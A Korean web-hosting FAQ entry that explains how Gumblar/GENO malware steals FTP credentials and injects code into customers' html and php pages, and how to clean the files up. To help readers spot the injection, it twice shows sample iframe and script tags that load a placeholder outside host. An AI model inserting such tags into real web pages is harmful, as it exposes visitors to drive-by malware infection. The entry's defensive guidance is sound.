공지 사항
묻고 답하기
입금 확인
자주 묻는 질문
Tip & 자료실
원격 지원
Home > 고객 센터
자주하신 질문
제 목 html문서에 이상한 코드가 삽입돼 있어요.
날 짜 04-07 17:19 작성자 운영자 조회수 11837
최근 바이러스에 감염된 PC에서 index, mail, php, htm 또는 html 등의 문서를 작성할 경우 의도하지 않은 악성코드를 삽입해 문서를 위변조하는 사례가 종종 발생하고 있습니다. 이 경우 악성코드 등에 감염된 PC에서 웹 사이트의 파일을 관리하는 FTP 프로그램을 사용하고 있는 경우, 계정 정보가 노출되어 악성코드를 다운받는 코드를 심어놓게 됩니다.

이러한 악성코드를 방지하기 위해서는
첫째, v3나 알약 등 바이러스체크 프로그램들을 이용하여 바이러스에 감염된 PC를 체크 및 치료해야 하며,
둘째, 링크파일 접속 비번을 반드시 변경해준 후 알FTP 등의 접속 비번도 동시에 변경해 줘야 합니다.
셋째, 위 문서 중 악성코드를 다운받는 코드를 반드시 삭제한 후 악성코드가 없는 파일로 교체해서 업로드해야 합니다. 
       *악성코드의 형태
      <iframe~> 으로 시작하여 </iframe> or <script~> 으로 시작하여 </script>
     
<iframe src="http://xxxxxxxx/index.php" width=198 height=141...............</iframe>
      <script src=http://xxxxxxxx/index.php ></script>
       이런 악성코드를 반드시 삭제해야 합니다.

넷째, 공공장소에서 웹FTP의 사용을 자제(특히 PC방)해 주시기 바라며, 부득이하게 공공장소에서 이용했을 경우 반드시 비밀번호를 변경해 줍시다.

보다 자세한 내용은 아래를 참고해 주시면 고맙겠습니다.

개인 컴퓨터에 검블러(Gumblar) 또는 GENO 라고 불리는 악성코드가 심어져 있을 경우!!

해당 악성코드는 어도비(Adobe)사의 아크로뱃이나 플래쉬의 보안 패치가 되지 않은 PC가 특정 웹 사이트를 열기만 해도
감염되는 '드라이브 바이 다운로드' 방식으로 전파되고 있어 감염속도가 매우 빠릅니다.
또한 감염된 PC 이용자가 웹사이트의 파일을 관리하는 FTP 프로그램을 가지고 있을 경우 ID와 비밀번호를 빼내 해당 웹사이트의 index, main 등의 이름을 가진 html, php 파일들을 변조하여 악성코드를 다운받는 코드를 심어놓게 됩니다.

해결방법은 아래 있으니 보시고 꼭 점검하시기 바랍니다.

>>>>>> 해결 방법1 <<<<<<

1. Adobe Reader update
Adobe Reader 실행하고 메뉴 -> 도움말 -> 업데이트 확인 에서 update 를 진행하시기 바랍니다.

2. Adobe Flash update
http://kb2.adobe.com/cps/155/tn_15507.html
위 사이트에서 Player Version 이 WIN 10.0.22.87 보다 낮으신 분은 최신으로 업데이트 하시기 바랍니다.
최신 버전은 아래 주소에서 다운로드가 가능합니다.
http://get.adobe.com/kr/flashplayer/

3. V3, 알약 등 최신 백신 사용하여 회원님 PC를 반드시 점검하시기 바랍니다.

4. 변조된 html 또는 php 파일에서 다음과 같은 형태의 코드를 제거하시기 바랍니다.
<iframe~> 으로 시작하여 </iframe> or <script~> 으로 시작하여 </script> 끝나는부분까지 삭제
<iframe src="http://xxxxxxxx/index.php" width=198 height=141...............></iframe>
<script src=http://xxxxxxxx/index.php ></script>

관련자료:
http://www.boannews.com/media/view.asp?idx=16569&kind=1
http://www.fnnews.com/view?ra=Sent0901m_View&corp=fnnews&arcid=090522164152&cDateYear=2009&cDateMonth=05&cDateDay=22
http://garwarner.blogspot.com/2009/06/gumblars-48000-compromised-domains.html

 ( IP : 211.222.139.197 )
 
 
사업자 정보 확인